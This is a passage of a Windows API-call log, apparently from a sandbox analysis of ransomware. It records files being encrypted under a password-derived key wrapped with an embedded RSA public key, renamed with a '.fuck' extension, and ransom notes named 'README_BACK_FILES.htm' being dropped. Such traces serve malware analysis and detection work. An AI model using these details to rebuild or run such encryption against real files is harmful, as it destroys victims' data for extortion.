nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.637] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.638] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.638] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.638] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.638] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.638] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0283.638] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0283.638] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0283.638] CloseHandle (hObject=0x5d4c) returned 1 [0283.638] CloseHandle (hObject=0x5d3c) returned 1 [0283.719] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0283.724] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0283.725] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0283.726] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0283.728] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0283.728] CryptDestroyKey (hKey=0x2fc6c8) returned 1 [0283.728] CryptReleaseContext (hProv=0x2f1fdc8, dwFlags=0x0) returned 1 [0283.728] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0283.728] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0283.728] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa\\readme_back_files.htm")) returned 0xffffffff [0283.731] AreFileApisANSI () returned 1 [0283.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0283.731] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0283.732] GetFileType (hFile=0x5d80) returned 0x1 [0283.732] WriteFile (in: hFile=0x5d80, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0283.749] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0283.749] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0283.750] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0283.750] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0283.750] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0283.750] GetLastError () returned 0x0 [0283.750] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa-arab\\filesync.localizedresources.dll.mui")) returned 0x20 [0283.750] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0283.751] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa-arab\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0283.752] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa-arab\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0283.753] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0283.754] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1fed8) returned 1 [0283.756] CryptCreateHash (in: hProv=0x2f1fed8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0283.756] lstrlenA (lpString="pGpbyAKBqFInvnaizuuTisKUzMlQm") returned 29 [0283.756] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0283.756] CryptDeriveKey (in: hProv=0x2f1fed8, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc448) returned 1 [0283.756] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0283.756] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0283.756] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1fe50) returned 1 [0283.757] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1fe50, dwCertEncodingType=0x1, pInfo=0x2f381a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f381d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f381d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc488) returned 1 [0283.757] CryptEncrypt (in: hKey=0x2fc488, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0283.757] CryptEncrypt (in: hKey=0x2fc488, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f200f8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f200f8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0283.757] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f200f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f200f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0283.758] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.760] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.760] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.761] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.761] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.761] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.761] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.761] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.761] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.761] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.761] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.761] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.761] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.762] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.762] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.762] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.762] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.762] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.762] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.763] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.763] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.763] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.763] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.763] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.763] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.763] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.763] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.763] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.764] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.764] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.764] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.764] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.764] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.764] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.764] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.764] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.764] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.764] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.764] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.764] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.765] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.765] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.767] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.767] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.767] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.767] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.768] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.769] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.769] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.769] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 